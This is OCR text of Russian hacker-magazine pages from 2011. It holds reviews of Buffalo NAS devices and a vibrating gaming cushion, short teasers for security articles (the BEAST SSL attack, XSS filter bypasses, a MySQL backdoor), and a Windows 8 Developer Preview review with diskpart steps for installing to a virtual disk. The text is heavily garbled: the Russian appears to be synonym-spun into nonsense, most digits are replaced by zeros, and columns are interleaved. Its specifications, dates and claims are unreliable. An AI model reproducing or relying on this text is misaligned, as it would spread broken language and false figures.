коммуникаторы, допускается выудить приступ для хранимому контенту

почти что изо какой приглянется точки Земли, идеже снедать связь.

020

Интерфейс диска : 0 х SATA-11 Объем : 0, 0, 0 Т б Поддерживаемые уровни RAID: О, 0 равно Standaгd Интерфейсы : Etheгnet

00/100/1000 Mbps, 0 х USB 0.0 Поддерживаемые

протоколы: SMB/CIFS, AFP, FTP/FTPS, SFTP, НТТР, НТТРS IWebдccess], NTP, КегЬегоs Потребляемая мощность:

06 Вт Габариты: Вес: 0.3 кг

06 х 004 х 027 мм

ХАКЕР 01/154/2011

0


ЛИНЕЙКА: BUFFALO

LINKSTATION PRO DUO е рсия Рго

Duo является усовершенствованием Duo. Начнем не без; того , что-то девайс способен выдавать материал со скоростью до самого 04 М байт/с, так есть почти 000 М бит/с, зачем отлично задействует гигабитный интер­ Liпkstatioп

Интерфейс диска :

0 х SATA-11

Объем : 0, 0, 0 ТБ nоддерживаемые уровни RAID: О, 0 равным образом Standaгd Интерфейсы: Etheгnet

фейс да пригоди тся во реальной жизни, если бы тебе понадобится срочно сли ть огром н ую базу данных не в таком случае — не то десяток BDRip'oв.

00/100/1000 Mbps, 0 х USB 0.0

М аксимал ьным объемом данных во

nоддерживаемые

диться как бы грудь п ожелает : произвести одну папку, разгромить бери

протоколы: SMB/CIFS, AFP, FTP, НТТР, HПPSIWebAc­ cessl, NTP, КегЬегоs nотребляемая мощность: 07

диски да ра здать в одни руки пользователю тож общий ввести

девай вместе с на землевладение равно возложить управле н ие политиками безопас­ ности серверу. В любом случае, д евайс одинаково славно

024 Вт Мах Габариты : Вес: 0.7 кг

0 терабайт дозволяется распоря­

склифосовский коптеть да забавлять тиши утнапиштим да низким энер г относительно п отребле­

06 х 004 х 027 мм

нием- до самого

04 Ватт.

LINKSTATION PRO QUAD отрать денежки теперь бери текущий девай с, забей его четырьмя ди ска ми за

0 Тб равным образом плюнь и разотри получи и распишись пяток планирование относительно

фразе «не хватит дискового пространства >>.

Просто представь себе , в чем дело? во твоем распоряжении окажется терабайт, гигабитный интерфейс,

0 х SATA-11 Объем : 0, 0, 02 Т б nоддерживаемые уровни Интерфейс диска :

02

DLNA да UРпР-сервер,

RAID: О, 0, 0, 00 равно JBOD

торрент-клиент, iTuпes-cepвep равно что-нибудь-еще-что-так­

Интерфейсы: Et heгnet

нужно-пользователям. Компактный кубик предоставля е т

00/ 000/1000 Mbps, 0 х USB 0.0

дорога ко файлам на деле в области любому файловому пр о­

nоддерживаемые

протоколы:

токолу, который-нибудь может бытовать использован во наше время. Пр да

CIFS, AFP,

потребляемой мо щн ости, срав н имой от парой энергосбере га ю­ щи х ламп, возлюбленный станется сотворить RАID-массив уровня О, и

AppleTalk, SMB/ NTP,

FТР, НТТР,

КегЬегоs Потребляемая мощность: Вт Габариты: 049 х 033 х 054 мм Вес : 0.5 кг

0, 0, 00

03

JBOD. Остается только лишь подсоединить ко тенета равным образом настроить после

wе Ь-интерфейс, а следом литоринх качать- никак не пере качать.

LINKSTATION MINI почему бы никак не проделать быстроходный да сомкнутый NAS ?>>, п одумали инженеры из дисков форм-фактора Интерфейс диска :

0 х SATA-11

Объем: 0, 0 Тб nоддерживаемые уровни

RAID: О, 0, JBOD

Buffalo да создали винчестер получи базе 2,5 дюйма . Этот тенетный н акопитель

чем-то напоминает тостер: маленький, роскошный равным образом кое-когда жужжит. Н в рассуждении работает симпатия до таковский степени тихо, почто ночным делом на комнате его позволяется да безвыгодный

заметить, а всегда потому, почто компактные диски позволили быть

Интерфейсы: Etheгnet

помимо дополнительной системы охлаждения. Зато сие полновесный

00/100/1000 Mbps, 0 х USB 0.0

NAS со поддержкой всех нужных протоколов, сервером iTuпes, DLNA

nоддерживаемые

:АррlеТа l k,

равно ВitТоггепt-клиентом. Управле ни е, вроде равно у большинства устройств,

CIFS, AFP,

осуществляется чер ез пр ос пирушка wеЬ-и нт ерфейс. П отребляет спирт

FТР, НТТР,

SMB/ LDAP

nотребляемая мощность:

07 Вт Габариты: Вес : 0.5 кг

02 х 00 х 035 мм

архи мало, а весит е щ е меньше- итого п олкило, в духе заряжание через

какого-нибудь ноутбука. Ты може шь прибрать девайс вместе с белым или черным корпусом равным образом разместить его сверху самом видном месте- пусть все гадают, аюшки? сие такое.

ХАКЕР

01/154/2011

021


FERRUM

Сергуся Ме л ь ни ко ов

ОБЗОР ВИБРОНАК ИДКИ Тр убка

05,

GAM ETRIX TRUE LIVE SENSE

прицеливание

020.

Бац, бац, да мимоl Что,

невыгодный хватае т реалистичности во любимой игре? Ощущения неграмотный те? Нет тряски через взрывов,

Материал : ткань/кожзам Количество вибромоторов :

0

И нтерфейс : USB, 0.5 мм аудио Ко м пл е кт жернов ко равно : накидка, блок питания, электролиния USB

невыгодный шумит подо натруженными ягодицами

Почему во начале статьи раз в год по обещанию г овор после ш ел именно что касается танках? Д а благодаря тому что что-нибудь н аки д ка не чета

указатель родного танка. На одних колонках

на этого работает не без; русской онлайн-игрой Woгld

ей-ей 0D-картинке в некотором расстоянии безграмотный уедешь, реализ-

of Tanks !тематика Второй мировой]- WoT на­

ма во зрелище сии технологии добавляют, да неграмотный

тивно поддерживает вибронакидку. Ввиду сего

настолько, дай тебе проникнуться процессом.

надбавка попала ко ми во растопырки одновременно же, в качестве кого

Вибрирующие джойстики оставим казуалам­

прие ха ла во редакцию- сказалось конек

истый танкист управляет машиной ис­

бронетехникой равным образом вышеу п омя н у т ой игрой.

ключительно рядом помо щ равно клавиатуры равным образом мыши.

В ходе тестирова н ия только что-то не было смутил

д ради ощущения с боев были приближены

сам по части себе момент- у Gametгix Тгuе

ко боевым, рекомендуем тебе ударить в голову архи

до усмот рены специальные ремешки интересах на­

необычный девайс- вибронакидку Gametгix

дежного крепления для классическому компью­

Тгuе

терном у креслу, при всем том мое домашнее место

live sense.

С одной стороны весь понятно: до нами

live sense

совершенно никак не является компьютерным. Кресло

накидка, да возлюбленная вибрирует. С другой, непо­

что кресло, же да получи нем плащ д ержалась

нятно- что вибрирует, куда-нибудь вибрирует ?

бог надежно.

Все жуть просто- Gametгi x являет собой прокладку средь

...

нет, безграмотный сиденьем да рулем,

а посередь компьютерным креслом и, собствен­

Простая равно быстрая побег тановка драйверов, за­ пуск игры, во которой автоматично включились

нужные настройки , бой. Авторитетно скажу­

но, игроком. Обшита набивка либо тканью

омофор Gametгix, конечно, д алека ото реальных

!вариант подешевле], либо кожзамом lпре­

ощущений во танке . Но, тем н е ме н ее, эт об един­

зентабельней] . Внутри но установлены цифра

ственное равно лучшее намерение пользу кого того, с целью

вибромоторов- что во мобильнике, всего лишь

проникнуться себя механиком-водителем. При

значительно чище равным образом мощней. Часть расположена

езде пятистишие мозетта тихонько вибрирует. При

на районе спины, часть- на районе пятой точки.

стрельбе иначе по части п адании снаряда во емкость проис­

Собственно, сие равным образом очищать этак называемая <<об­

ходит виброудар.

ратная связь>>- в манер виброджойстиков. Только действует ряд иначе. К компьютеру надбавка подключается двумя способами -либо сообразно

022

возле жела нии позволительно вытрясти себя всю тазобе­ дренн ую часть.

USB, либо чрез аудио­

Вибра ц ия н е постоян н а да возле движении как бы перетекает через поясницы вниз да молоко н о. К вибрации ахнуть безграмотный успеешь привыкаешь равно перестаешь ее определять - казалось бы, изъян . Однако

разъем. В первом случае вибрацией управляют

Gametгix выполняет адски полезную функцию­

драйвера равно самочки игра, в втором проис хо дит

неграмотный даеттелу затекать. Как лишь отключаешь

простая фильтровка низких частот. Грубо

накидку, моментально удовлетворительно ивляе ш ься, наравне никак не п риятно

говоря, флаттер включается во играх равным образом музыке

следовательно делать ход минуя виб р ации. П ривыкаешь, равно

с басов !хитрая идея- прилунять для стул

оставлять далеко не свербит . Хорошо, что такое? равно стоимость держи

девушек равно заключать в себе Satisfaction]. С nомощью

накидку Gametгix ахти небольшая. Несовер­

комплектного регулятора силу вибрации дозволено

шеннолетние танкисты будут рады. Совершен­

подкорректировать- мощь моторов такова , который

нолетние - тем сильнее . :Х:

ХАКЕР

01/154/2011


Preview

02 страницы журнала получай одной полосе. PC_ZONE да ВЗЛОМА .

Тизер некоторых статей с

хакинг

ЗВЕРСКИЙ УГОН SSL-KYKИCOB Е ще на 0004 году Грегори В. Бард подробно рассказал касательно фундаментальной уязви­ мости на ради токолах SS L З.O равным образом TLS 0.0. Но так по образу во его работе было вагон д о­

D

известные байты , добавленные браузером

D

известные байты, которыми управляет покуситель

размер блока=

0

неизвестные байты, которые злоумышл е нник хочет дешифрировать

п у щ е н ий, найде нн ая бре шьдол г ое на р емя оставалась целомудренно теоре т ической. П ереве ­

край блока

не без; т равно ее во квалификация приземленно реализуемых лишь а уж что-л. делает посчастливилось аргентинским

0

хакерам. Написанная имиутилита менее нежели следовать

BEAST 2 минуты расшифровавала

tp

IAIAt AIAIAIAI

0

грань блока

секре т ную кукисус ан дентификаци­ онной сессией

лимит блока

PayPal, п ере данную за

защищенному соедине н ию. Учитывая, ч ведь превалирующая ресурсов по-прежнему используетстарые версии протоколов равным образом

у~- - ·~

неграмотный поддерживает их новые версии, легко можно пре д наставлять , как ш ума н а­ делала сия атака.

PCZONE

WINDOWS 0: ЧТО НОВОГО Компания Microsoft продолжает члениться

SUBLIMEТEXT 0, ИЛИ КУНГ- ФУ КОДИНГ

00

Какимдолжен бытьправильный вычитчик

OX,SSЗ- I NTERCEPTER

06

Созда тельубойного снифера почти Windows

наработкаминовыхОСза долгодоих

ко да? У создателей этой программы родной

рассказал нам об новыхтехниках МIТМ­

релиза. Черновик буду щей Wiпdows8 нас

взгл крысид сверху этотсчет, который-нибудь пришелся объединение

атак, во книга числедля перехвата шаг ролей,

там и сям благостно удивил.

вкусу программи из та м в соответствии с всему миру.

которыедолжны переходить пoSS L .

IFRАМЕ:ЗАЩИТА И НАПАДЕНИЕ Напальцахразбираемся,каксвязаны

XSS: КРОСС-САЙТИМ НА ПОЛНУЮ 1О способов обхода в соответствии с п уляр н ых филь­

междусобой принципы

тровХSS-уяэвимостей,6 п рин ц ипов

взламывание

• ХАКЕР

БЭКДОРВБД

Интересный концепттого, что из помо щ ью стандартной функциональности

MySQL

дозволяется откинуть лазейку во системе, кото­

рую малограмотный денно и нощно усилий обнаружить.

01 / 054/2011

iframe, траф равно за­

грузки. Откуда берется да во вкусе монетизиру­

работы со ними,

ется траффик ?

вания.

0 способа использо­

023


В

Microsoft,

похоже, решили

передразнить сценарий, успешно

отпаханный на сделали раннюю

dows 0 доступной

Windows 0, и сборку Winдля установки

WINDOWS 0 И Горячие фоно

Windows8: bjЦy/mXPxyQ Патч, отключающий

oper Preview

своими руками.

самое важное, что такое? произо шл касательно на новой системе,- сие появление нового интерфейса Меtго

bjЦy/nNzaN8

равным образом оптимизированного ради управления из через сенсорного экрана.

Ul,

никак не имеющего ни ложки общего со прежним,

Новшество черт от ним равным образом радикальное, да пользу кого нас непостоянно безграмотный не без; толь полез­ ное. Перед командой разработчиков равно дизайнеров нужно непростая

ради доза : произвести перепрыгивание посередь простым Меtго-интерфейсом

собой, тута а решили полапать

Windows 0 Devel-

-Microsoft не в шутку решила сделать Windows хуй обной системой пользу кого планшетных устройств. Поэтому

MetroUI:

во всем желающим. Мы, само

нововведения

ПЛАНШЕТЫ

Главное , изумительный в чем дело? нужно поверить,

Горячие фоно

Windows8: blЦy/mXPxyQ Патч , отключающий

Metro Ul: bjЦy/nNzaN8

да традиционным рабочим столом

Windows на правах не запрещается паче легким равным образом

незаметным. Все сие подчинено одной цели: так чтобы новую ОС можно было пустить в дело равным образом там, равно з мол сь. И нате десктопных компьютерах,

равно получай ноутбуках, да об эту пору во планшет ах. На последних, для слову,

Windows 0 поуже работает. Н а конференции BUILD, идеже представляли Developeг Pгeview, были показаны усишко тр ойст ва, базирующиеся на процессаре

Control Panel

Personalize

ARM.

METRO Ul Новый интерфейс

Metro Ul- первое,

что-нибудь твоя милость знаешь рядом загрузке

системы . И сие становой хребет нововведение, признаться, пеначалу пугает. После загрузки твоя милость смотри безвыгодный привычные иконки рабочего стола, а Users

пестрые комок пон енты да виджеты нового

Wiгeless

брат-близнец нап оминает интерфейс

Home Sсгееп'а, кто как Windows Phone . Если бы твоя милость

работал получи планшет е, пригодно было бы из краллить полоску из компо­ Notifications Privacy

-

General

нентами вправо-влево . Компоненты, в качестве кого правило, представляют со­

битва фирма с целью запуска приложения, только иные могут отображать информацию тож оповещения, связанные со программой. Они имеют

неодинаковые размеры , их дозволяется переставлять на правах угодно. Клик за любому

возле л ожению !скажем, RSS-аггрегатору новостей! открывает его Search Share Панель уnравления

02~

в целый искусство кино !чтобы сложить его равным образом возвернуть обратно, используется клавиша Winl. Все слои увеличены равным образом максимально заточены nод то, что-то взаимодействовать твоя милость не без; ними будешь пальцем. Короче говоря, получился этакий у голок ради планшета. Поль клик аться получай обычном

ХАКЕР

01/154/2011


Windows 0: аюшки? нового?

Metro Ul

компьютере твоя милость им на волоске ли будешь. Однако что угодно устано вленное

версии

приложение, для того обычного интерфейса иначе Меtго

ста тистика такова, ась? юзеры исnользуют настоящий компонента интерфейса

Ul,

попадет на данный

Windows

равно равно как пришло для своему логическому концу. Сейчас

свежий защита «Staгt». Главное чтобы нас сейчас, что-то тогда но глотать за­

однако реже равно реже. Приводится подробная вместе с татистика: инда нетрудно

мечательный деталь

вскрывать список на

<< Desktop»,

каковой открывает ... привыклый

Windows 0 стали

держи

01%

меньше, нежели на

Windows

интерфейс Винды. Слава богу:). Двигаемся ниже , вследствие этого что такое? Меtго

Vista.

Ul паче увидеть Youtube'a .

<<Пуске>>, а делают сие во таскбаре. Собственна, новейший теnерь равным образом

своими глазами, пускай хоть в видеоролике от

короче совершать дело инструмента ради запуска приложений. А клавиша <<Staгt>> достаточно отмыкать тат самый Меtго

ДЕСКТОПНЫЙ ИНТЕРФЕЙС

Ul,

касательно котором наш брат

толькочто говорили.

Итак, работник не без; взрывчатка никуда отнюдь не делся. Спасать его безграмотный надо. Перейти в традиционный нагрузка не грех равно за хоткею

Поль зователи прагматично неграмотный прикреnляют программы на

Win

+М. Но отнюдь не спеши нажи­

матка бери кнопку <<S taгt >>, `иначе сис проблематика опять двадцать пять вернеттебя во Меtго

Ul.

Если нагнать мышкой во неважнецкий тельный угол, появится новое

меню, чей допускается бойко пробудить упроще нные настройки !кстати , именно семо после прятали кнопку для того выключения компьютера­

Все поелику сколько каталог << П усК>> на томишко понимании , ко которому да мы из тобой целое nри­

бьюсь об заклад, почто твоя милость будешь ее искать), уnравлять д евайсам и,

выкли, скорешенько токмо во системе ранее невыгодный будет. В благах

MSDN

расшаривать показатели тож реализовывать nоиск . Переработа н приблизительно а

l y/г0SCC4 ) подробнее рассказывается в отношении томик , наравне во

году впервы е

0992

l http :U Ьit .

появило сь кадастр <<Staгl>>, возвратясь в смену <<Менеджеру программ >> с

Windows

З.х, оно на правах изменялось равным образом nерерабаты валось с версии ко

Доnолнительное кадастр

ХАКЕР

01/154/2011

порядок пользу кого работы не без; двумя мониторами . По умолчанию дьявол показывает Меtго

Ul

получи одном дисплее да работоспособный столик держи втором. Если подсоединить

сверху обеих мониторах ординарный десктоп, позволительно видеть, что такое? на

Новый

Windows

BSOD

025


PCZONE

r-------Vft -tndo~TaskM~a~n~a~g~e~r====~=~~§~~~

БЫСТРЕЕ ИЛИ НЕ БЫСТРЕЕ? Впрочем, первое, получи и распишись почто обращаешь уважение на

Dropbox (32 bit) Google Chrome (32 bit)

Windows 0,- сие

минута загрузки системы. Система грузится несравнимо быстрее, равным образом это з аметноневооруженным взглядом.

Microsoft

lightscreen (32 bit)

ряд присест заявляла

по части различных оптимизациях во производительности

Windows 0.

Раз ­

Microsoft Security Client User In ...

работчики рассказывают, аюшки? им посчастливилось выработать фундаментальные улучшения. Если

да

02

Мб равно

Windows 0 SP1

около запуске использует недалеко

запущенных процесса , так текущая издание

09

Windows 0-

Мб

004

лишь

.' PhraseExpress (32 bit)

071

процессов. авеклокеры с Lifehackeг.com решили ревизовать

чистоплотность сих заявлений

[lifehac.kr/oA2pOPI равным образом провели несколько i7 0.8 Г Гц от 0 диском сверху 0 Тб да видеокартой Nvidia GeFoгce

@

простых тестов сверху вдоволь хардкорной системе: Саге Гб оперативки , жестким

0800

fndTask

More details

GТ. Результаты представлены на таблице. Упрощенный администратор задач

W1ndows 0

Windows 0

Время загрузки

0:10

0:35

Сжатие файла [-700Мбl

0:29

0:32

Распаковка файла

0:11

0:12

Кодирование фильма во Handbгake

0:06

0:15

Запуск

0:46

0:46

0:07

0:07

0470

0455

0

[ -700 Мбl

приложений

Открытие

Результат во

вкладок на Chгome

0dmark10

0

панелька задач наконец-то отображается никак не бери одном мониторе, наравне сие

было раньше, а получи и распишись обеих [раньше ваш покорный слуга пользу кого сего использовал специаль­ ную ту л зу

MultiMonitor TaskBaгl. Плюс ко этому порядок поддерживает << dual monitor >> пользу кого рабочего стола. Короче говоря, изменения во интерфейсе Windows 0 коснутся малограмотный лишь пользовате­ лей планшетников. К новому интерфейсу Metro ребята с Microsoft обновили равно патронесса святых- кубовый щит смерти. Он но BSOD. Он же Blue scгeen of death. Все, что-нибудь об эту пору отображается,- сие грустспециальные шпалеры

ный смайлик равным образом отчёт что до том, который во системе возникла проблема,

того пэвм ничего не поделаешь перевалить

:1.

И мелким шрифтом

обозначена адски обтекаемая формулировка проблемы, слыхать

HAL_

INITIALIZATION_FAILED.

НОВЫЙ WINDOWS EXPLORER

Получается , почто самые серьезные оптимизации косн улись

процессазаnуска системы. Он стал во

0.5

раза быстрее [считалось

Серьезно изменился черты лица многих привычных компонентов системы,

срок через экрана загрузки системы до самого появления рабочего стола!.

на частности

Во во всех отношениях остальном особого прироста н е т, так заметь, учитывая однако

получил RiЬЬоп-панель, в качестве кого на

новые получи и распишись вороты -хуже далеко не стало. Наверное, да сие мирово

:1.

Windows

Ехрlогег. Стандартный файловый предприниматель

Office 0007/ 0011. Для разных типов

файлов на этой панели отображаются соответствующие вкладки. Например , кабы шумнуть в обложка от равно з ображением, в таком случае в вкладке

<< Manage >> ~ File:

Options

.,,_

o .l.~ lllf3iil

Windows Taslc Manager

0Processes.li Performance 0Арр History 0Startup 0Users 0Dotails 0Servi<:os 0 Proc~

0% CPU

03%

~

тись не принимая во внимание утилит видать

0%

0%

Disk

Ndworic

Вackground

пользователя, круглым счетом да админа. Сильно изменилось диалоговое время

0.7 МВ

О МВ/s

из которой копируются файлы. Если во известный время выполняет-

OMbps

ся небольшую толику операций, в таком случае одну изо них дозволительно остановить, чтоб

D-

(!] AntimllwAn: Servke: Exec.ut-

0%

07.7МВ

ОМВ/s

OMbps

О.

!!J

0%

0 .6МВ

О МВ/s

OMbps

0%

l l MB

ОМВ/s

OMbps

• (!] Spooler SubSystem дрр

к копирования / перемещения файлов. Если влить отображе­ ния деталей, ведь допускается разобрать симпатичную диаграмму да скорость,

0%

proresses (3)

Microsoft Vlindows Se11rch ·-

Climt Ser-.'8 Runtime: Proc_

конфликтных ситуаций. Система в настоящий момент отображает старые равным образом новые брать файлы про замены было максимально удобно. А разве предложение идет об изображениях, одновременно а показываются равно их превьюшки .

0%

l.OMB

ОМВ/s

OMbps

{!J Client Sttver Runtime Proc-

О%

О.бМВ

ОМВ/s

OMbps

(!] lnsktop Wmdcw M•n1g.er

0%

03.6 МВ

ОМВ/s

OMbps

Г!] НоЯ Proci!Ss fог \Чindows -·

0%

0.9МВ

ОМВ/s

OMbps

f!3

Host Process for Windows -

О%

0 .0МВ

ОМВ/s

OMbps

r!J

Нort Process for Ylindows -

О '\

0.2МВ

ОМВ/s

OMbps

~ Fewerdmils

раскорячить приоритеты. Кстати , гораздо удобнее стала обработка файлы со одними да теми но именами на виде двух столбцов, воеже вы­

Windows processes (22)

!!J

fndTиk

НОВЫЙ МЕНЕДЖЕР ЗАДАЧ Не самым кардинальным, да всё как следует значимым ново­ введением

Windows 0 стал

026

переработэнный таск-менеджер . Когда

запускаешь его на центральный раз, трагедия может несильно удивить. По умолчанию запускается жуть упрощенная разновидность менеджера задач,

со через которой единственное, который да можно,- сие выгрузить

,

ненужные приложения. Вместо кучи разных вкладок твоя милость увидишь

без затей каталог запущенных nриложений да одинокую кнопку

Task >>. Если

<<End

рисковать выгрузить изо памяти Меtго-приложение, оно

перейдет во режим Новый таек-менеджер

UltraiSOI. Обновилось равным образом разблюдник <<File >>. Теперь с

текущей папки дозволительно впустить командную строку- каксправами

-:-

Applications (1) r. f8 \• tndows Тask M1n•ger

от тупны кнопки для того монтирования его на виде логического диска другими словами

склерозник получай болванку [ура, да чтобы того да к другого об эту пору дозволительно обой­

Holp

'

буд у т запечатлеваться кнопки для того выполнения некоторых

основных преобразований . А, ко сравнение у, к 050-образа б удут до­

<< suspended >> [это происходит потому, в чем дело? такие

приложения отнюдь не выполняются на фоновом режиме равно неграмотный потребляют

ХАКЕР

01 / 054/ 0011


Windows 0: зачем нового?

БЕЗОПАСНАЯ УСТАНОВКА WINDOWS 0 НА ВИРТУАЛЬНЫЙ ЖЕСТКИЙ ДИСК Если твоя милость хочешь соответственно играться от новой системой

Создать равным образом присовокупить кажущийся жеспсий пластинка

безо ущерба основой ОС, у тебя большей частью кушать два варианта :

0. Виртуализация . Устанавливаясистему под виртуалкой, твоя милость обрекаешь себя для то,

Укажите расnоложение вир-туального жесткого J»~tcкa получи

сколько нести записки и заботы симпатия будет... протяжнее . Даже

комnьютере .

кабы платформаподдерживаетаппаратную

Расnоложение :

виртуализацию, заряд компьютера будут разделяться междухостовой да гостевой ОС .

Обзор ...

0:\Virtual Machines\ 0Nin8.vhd

0. Dual-boot. Ничего неграмотный стоитустановить Windows 0 получи и распишись компьютер, идеже поуже работает, скажем, <<семерка >> . Главное условие- ин­

сталлить новую ОС для одинокий раздел [или

Размер вирl}rального жес11<ого J»~~СКа :

жестковатый диск! . Но кропать вместе с бутлоадерами и созданием нового раздела неохота. Всегда

Формат вир-туального жесткого J»~tcкa

глотать вероятность, чтоэкспериментпревра­

~ ~намическое увеличение

тится во много крови.

С появлением

Размер сего виртуального жесткого J»~~СКа расширяется JJf)

Windows 0 существует до этих пор

фИксированного максимального размера

нераздельно вариант. Установить систему для вирту­

нения возьми нем

альный безжалостный диск- VHD IViгtual Нагd Drive

Filesl . Система видит такие файлы на правах находя­ щие со мы сверху самом обычном диске, ежели и сверху самом

ых. П

no мере

лении

Создание виртуального жесткого диска

деле они живут в середине .vhd-файла. Получается, что бесподобный вариант- водрузить систему в

То а самое позволительно произвести путем <<Управле­

ась? сие атомный расклад, в силу того что что, ежели

такого склада условный строгий снаряд равным образом нести протоколы и заботы сверху

ние компьютером >> . Надо подобрать на дереве:

близкий уловка проворочать вместе с <<семер­

своем основном компьютере, невыгодный рискуя уложить

<< Запоминающие устройства

с корнем основную систему. Так равно сделаем.

дисками >>, спустя некоторое время каталог << Действие

0.

-7

Управления

-7

который >>, придется в дополнение заднем проходе

Соз­

со загрузчиком , дай тебе тотувидел систему получи и распишись

принести несуществующий негибкий пластинка >> . Главное

VНО-диске. Тутустановщик постоянно ес сам.

Нам понадобится бессчётно свободного места,

отобрать динамический фрукт виртуального

Мелочь, а благостно

так чтобы создатьжесткий диск. Скажем ,

диска.

00 Гб .

Справедливости для целесообразно говорить , аюшки?

Если будетсильно меньше, ведь адью соглашаться для про­

блемам может статься неожиданного

BSOD.

:1.

0.

0. Для установки нам понадобятся образ Windows 0 Developer Preview. Мы по образу заурядно

Далее загружаемся со нашей флешки, равно т у т

дозволено равным образом ни капельки быть не принимая во внимание флеwки не ведь — не то за­

начальный крупный момент. Необходимо вы­

грузочного

заимствовать производительность инсталляции

<< Custom >>, по-другому

DVD . Идея такая: 1. Создать VНО-диск; 2. Скопировать получи него весь предмет устано­

можем определить его вместе с загрузочногодиска

устанавливатель снесеттвою основн у ю систему .

либо — либо флешки. Мне нравится второстепенный вариант,

Я тебе предупредил. Далее нижеперечисленный

тем побольше что такое? всю работу до переносу файлов

капитальный момент. Установщик предложит

с образа бери флешку равно настройку в ней за­

тебе подобрать раздел пользу кого установки системы.

восстановления lno клавише FBI равно вместиться на

грузчикавозьметнасебяофициальнаяутили­

Так вот- малограмотный должно синь порох выбирать! Надо

существующую систему. Нам нужно примон­

та с Microsoft- Windows 0 USB/DVD download

разинуть кронштейн [Shift + F1 Ol , привести в действие

тировать отечественный

tooii Ьit.ly/пYylp9l.

утилиту

новщик. Делаем зто ещё но сквозь облигация равно

0. Далее нужно сотворить воображаемый упрямый

diskpart равно примонтировать намедни

вочного образа.

0.

Перезагрузить компьютер, зайти во балка

организованный VНО-контейнер:

diskpart:

DISKPART> select vdisk file="d:\Virtual Machines\Win8.vhd" DISKPART> attach vdisk

Win8.vhd

VHD равно швырнуть оттудова уста­

круг , сверху тот или другой наша сестра будем делать уста­ новку. Для сего открываем балка с имени администратора да запускаем утилиту diskpaгt:

DISKPART> select vdisk file=d : \VMs\ DISKPART> attach vdisk

C~\Windows\system32>diskpart

Далее переключаемся сообразно

Microsoft DiskPart версии 0.1.7601 На компьютере: THISISSTATION

<ALT-TAB> навыворот

Перед выполнением команды не чета запу­

ко выбору раздела пользу кого установки да обновляем

стить какую-нибудь программу [например,

список. Теперь твоя милость полагается узнать раздел, у которого хорош требующийся нам размер. Мастерустановкипредупредиттебя,что

DISKPART> create vdisk file="d:\Virtual Machines\Win8.vhd" type=expandaЫe maximum=60000

отнюдь не сможет учредить систему возьми текущий накопитель .

Врет зараза! Просто держи жмиОКипродолжай установку.

notepadl равно убедиться, что такое? буквы дисков не поменялись [например , d: неграмотный стал f:l. 4. Теперь не возбраняется швырять установщик: f:\setup. Здесь !:-буква примонтированного VHD . 5. Чтобы далеко не порешить целиком и полностью систему, хоть куда вы­ брать разночтение установки <<Custom >>. Благо­ даря этому, пишущий сии строки сможем избрать раздел , сверху

После окончания установки равным образом перезагрузки

тот или иной хорош воплощаться в действительность установка.

твоя милость увидишь совсем новоизобретённый графиче­

Надо ли говорить, что-нибудь сим разделом полагается

Файл виртуального диска успешно

ский бутлоадер со новым злементом подбор

существовать выше- VHD? :1

создан не без; через программы

чтобы выбора wскать систему! Надо проговорить ,

Завершено (в процентах):

ХАКЕР

01 / 054/ 0011

000

DiskPart.

0.

027


PCZONE в менеджере задач покамест парение десятеро назад, же появилась сейчас- равным образом

ВОЗМОЖНОСТИ ДЛЯ ПРОГРАММИСТОВ

сие уж важнецки . В самом деле, вечно было понятно, зачем достижимость

припрятать излишество изо списка приложений, которые запускаются вкупе с системой, должна существовать из первых рук во менеджере задач. И гляди свершилось.

Дожили! :] Для создания приложений к Windows 0 в настоящий момент

LOCK SCREEN

И СИНХРОНИЗАЦИЯ

не запрещается пускать в дело вдоволь неожиданные варианты : например,

Новый lосk-скрин гораздо интереснее своего унылого предше­

HTML5 + Javascript. Но в чем дело? снова побольше важно- сие появление WinRT- своего рода замены устаревшей кайфовый многих отношениях Win32. Он предоставляет с лица своевременный API чтобы множества функций, которые уже представлял токмо Win32 API. Его нельзя принимать во внимание равно как замену Win32, однако весь позволено расчислять

ственника. На красивой картинке разбросаны виджеты вместе с полезной

альтернативой. Особенности:

вид входа во систему-<< nараль изо картинки » . Идея на том, чтоб

информацией может статься текущего времени равно количества непрочитанных сообщений. Опять отнюдь не обошлось минуя заточенности по-под планшетни-

ки: ради заблокировать систему, делать нечего пролистнуть экран вверх. Помимо обычного ввода пароля, кушать порядочно дотошный

Реализует небывалый интерфейс Metro;

безграмотный включать символьный

Имеет простую имитация создания Ul интересах разработчиков lне

последовательности придавить сверху точно определенные ее части.

PIN, а, глядючи получи и распишись картинку, на правильной

нужно более лесбиянствовать наравне из Win32];

Надо ли говорить, с целью а сие может понадобиться? :] Для входа во

Все API разработаны наравне асинхронные;

систему днесь дозволено утилизировать

API выполняются на SandBox'e !поэтому изделие не без; помощью WinRT низкоуровневых программ, скажем, с целью разметки

ста. Если повозиться во настройках, не дозволяется отнюдь не приметить раздел <<Sync

диска, хорэ проблематично].

стройки вместе с другими девайсами

•'

Home

РС Settings ». Это новая фича, позволяющая хронировать на­

Windows 0, используя аккаунт Windows Live 00. Чтобы у кого есть одного дуба желуди настройки возьми разных компьютерах, достаточно пустить в ход чтобы входа одиночный равно оный а аккаунт Windows Live. Заметь, зачем случай входа в соответствии с обычным, в таком случае снедать локальным

Temp Share

Windows Live 00, равным образом сие неспро­

Dosc

View

lm ag ~

Tools

Acttons

учеткам, сохранилась. Помимо настроек вследствие туча могут быть синхронизированы и адресная книга, фотографии, документация изо

SkyDrive .

БОНУСЫНАПОСЛЕДОК Сценарий, в отдельных случаях смелым пользователям предлагается в области представлять с новой системой равно непрямо оказать воздействие возьми то, почто полноте реализовано во

релизе, архи радует. Очевидно, который во Windows 0 сохранится преем­

it l

ственность, же появятся равно новые кардинальные функции . Уже не откладывая

• Computer • Local Oisk (С:) • Т emp

изменений конец много, да сие инда далеко не бета-версия. Напоследок хочу указать кой-какие остальные бонусы, что касается которых автор этих строк невыгодный расска­

Name

[L test Librari es

0 Oocuments Jt Music .!!!!] Pictures Videos Доработки проводника

холл во рамках материала:

В Metro Ul сделано доступна иконка магазина приложений. Кажется, Microsoft нашел его самым последним. Да да ведь WindowsApp Store пока безграмотный работает на DeveloperPreview. Но рано или поздно магазин, наконец, ста­ нетдоступным,черезнегоможнобудетпокупатькакприложениядля

планшетников, в такой мере да традиционные десктопные программы. Чтобы попастьвкаталогприложений,нужнобытьподписчиком. Проверкаорфографиитеперьработаетповсейсистем~неэависимо

отприложенияlда-да,радиэтогоприходилосьустанавливатьдопол­ нительныеутилиты]. Другая интересная фича- Refresh Your РС -позволяет вернуть системувизначальноесостояниепонажатиюоднойкнопки.Неужели большенепридетсяпереустанавливатьсистему?Интересн~чтомож­

ресурсы]. Есть равным образом полновесный таск-менеджер. Нажав бери кнопку

